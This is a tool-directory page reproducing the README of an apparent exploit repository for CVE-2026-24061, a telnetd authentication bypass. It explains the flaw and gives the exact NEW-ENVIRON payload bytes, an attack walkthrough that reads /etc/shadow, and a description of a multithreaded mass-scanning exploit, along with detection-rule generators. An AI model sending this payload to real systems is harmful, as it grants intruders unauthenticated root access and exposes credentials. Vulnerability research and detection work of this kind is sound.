Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2026-24061 — GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection. | Kitploit
Tools/GitHubGitHub/franckferman/cve-2026-24061
Vulnerability ScannersExploitationNetwork SecurityPenetration TestingThreat IntelligenceAuthenticationLearning & EducationRed Teaming
GitHubfranckferman/cve-2026-24061

CVE-2026-24061

GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection.

View Repository
5256 months agoNot yet reviewed
Website

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE Score License Python No deps

GNU InetUtils telnetd - Unauthenticated Remote Root via NEW-ENVIRON Variable Injection

Overview - Technical Analysis - Affected Versions - Usage - Remediation - References


Vulnerability Overview

CVE-2026-24061 is a critical authentication bypass vulnerability in the telnetd daemon distributed as part of GNU InetUtils. The flaw resides in the handling of the Telnet NEW-ENVIRON option (RFC 1572) during the initial protocol handshake.

The root cause is a failure to sanitize client-supplied environment variables before passing them to the login(1) program. When the Telnet daemon receives a NEW-ENVIRON IS sub-negotiation packet containing the variable USER with the value -f root, it passes this unsanitized value directly to the system login binary.

On systems where login accepts the -f flag (force login without password verification), this results in an unauthenticated root session being granted to the remote attacker.

This vulnerability class has historical precedent: CVE-2001-0797 in SysV telnetd and the well-known Linux telnetd -f bypass from 1994 exploited the same fundamental failure to sanitize environment-sourced arguments passed to privileged binaries.

No credentials required. No prior access needed. A single network packet sequence achieves root.

Technical Analysis

Root Cause

GNU InetUtils telnetd processes NEW-ENVIRON (option code 0x27, per RFC 1572) sub-negotiation to collect client-supplied environment variables. These variables are assembled into an argument vector and passed to execve(2) when spawning login(1).

The vulnerability is triggered as follows:

  1. The server sends IAC DO NEW-ENVIRON, soliciting environment variables from the client.
  2. The malicious client replies with IAC WILL NEW-ENVIRON.
  3. The server follows with IAC SB NEW-ENVIRON SEND IAC SE.
  4. The client sends the injected payload:
IAC SB NEW-ENVIRON IS
  VAR "USER" VALUE "-f root"
IAC SE
  1. telnetd constructs the login invocation as login -f root.
  2. login(1) interprets -f as "force login, skip authentication" and logs in the specified user (root) without requiring a password.

Protocol-Level Breakdown

StepDirectionTelnet Bytes (hex)Meaning
1S -> CFF FD 27IAC DO NEW-ENVIRON
2C -> SFF FB 27IAC WILL NEW-ENVIRON
3S -> CFF FA 27 01 FF F0IAC SB NEW-ENVIRON SEND IAC SE
4C -> SFF FA 27 00 00 55 53 45 52 01 2D 66 20 72 6F 6F 74 FF F0IAC SB NEW-ENVIRON IS VAR "USER" VALUE "-f root" IAC SE

Why -f root Works

The login(1) binary on many Linux systems accepts the -f <user> flag for "pre-authenticated" logins, historically used by terminal multiplexers and rlogin. When telnetd builds its exec call and fails to strip leading hyphens or validate option-like strings in environment variable values, it inadvertently passes attacker-controlled flags directly to login.

The effective call becomes:

execve("/bin/login", ["login", "-f", "root"], envp);

Attack Scenario

Attacker                                    Vulnerable telnetd (port 23)
   |                                                   |
   |------- TCP SYN (port 23) ----------------------->|
   |<------ TCP SYN-ACK -------------------------------|
   |------- TCP ACK ---------------------------------->|
   |                                                   |
   |<------ Telnet banner + IAC DO NEW-ENVIRON --------|
   |------- IAC WILL NEW-ENVIRON --------------------->|
   |<------ IAC SB NEW-ENVIRON SEND IAC SE ------------|
   |                                                   |
   |------- IAC SB NEW-ENVIRON IS                      |
   |        VAR "USER" VALUE "-f root" IAC SE -------->|
   |                                                   |
   |        [telnetd calls: login -f root]             |
   |                                                   |
   |<------ Root shell prompt (#) ---------------------|
   |                                                   |
   |------- id; whoami; cat /etc/shadow -------------->|
   |<------ uid=0(root) root /etc/shadow contents -----|

Prerequisites:

  • Target system running GNU InetUtils telnetd (TCP/23 open)
  • Unpatched version of inetutils
  • login(1) binary supports the -f flag (standard on most Linux distributions)
  • No firewall blocking TCP/23

Affected Versions

SoftwareAffected VersionsStatus
GNU InetUtils telnetd<= 2.x (specific patched version TBD)Vulnerable
Distributions shipping unpatched GNU inetutilsVariousCheck vendor advisory

Verify whether your distribution ships a patched version. Many modern systems have Telnet disabled by default; exposure requires an explicitly running telnetd.

CVSS Score

MetricValue
CVSS v3.1 Base Score9.8 (Critical)
Attack VectorNetwork
Attack ComplexityLow
Privileges RequiredNone
User InteractionNone
ScopeUnchanged
Confidentiality ImpactHigh
Integrity ImpactHigh
Availability ImpactHigh
Vector StringCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

MITRE ATT&CK Mapping

ATT&CK IDTacticTechniqueRelevance
T1190Initial AccessExploit Public-Facing ApplicationDirect exploitation of telnetd over the network
T1059ExecutionCommand and Scripting InterpreterShell execution post-exploitation
T1078.004Privilege Escalation / Defense EvasionValid Accounts: Local AccountsAuthentication bypass yields a valid root session
T1548Privilege EscalationAbuse Elevation Control Mechanismlogin -f flag abused to bypass PAM/authentication
T1046DiscoveryNetwork Service DiscoveryMass scanning component of the PoC

Installation

Requirements: Python 3 (standard library only, zero external dependencies).

git clone https://github.com/franckferman/CVE_2026_24061.git
cd CVE_2026_24061

No pip install needed. Both scripts use only the Python standard library.

Project Structure

poc_cve_2026_24061.py       # Simple PoC (~100 lines) - understand the vulnerability
cve_2026_24061.py           # Industrialized exploit - multithreaded, CIDR, CSV/JSON export
scripts/
  generate_signatures.py    # Auto-generate Snort/Suricata + Sigma rules from payload
  generate_misp_event.py    # Generate MISP-importable event JSON
  generate_stix_bundle.py   # Generate STIX 2.1 bundle (MISP, OpenCTI, TAXII)
signatures/
  snort.rules               # Snort/Suricata detection rules (auto-generated)
  sigma.yml                 # Sigma rule for SIEM (auto-generated)
indicators/
  misp_event.json           # MISP event - import via Events > Add Event > Import
  stix_bundle.json          # STIX 2.1 bundle - 11 objects (vuln, indicator, ATT&CK, CoA)
Download Tool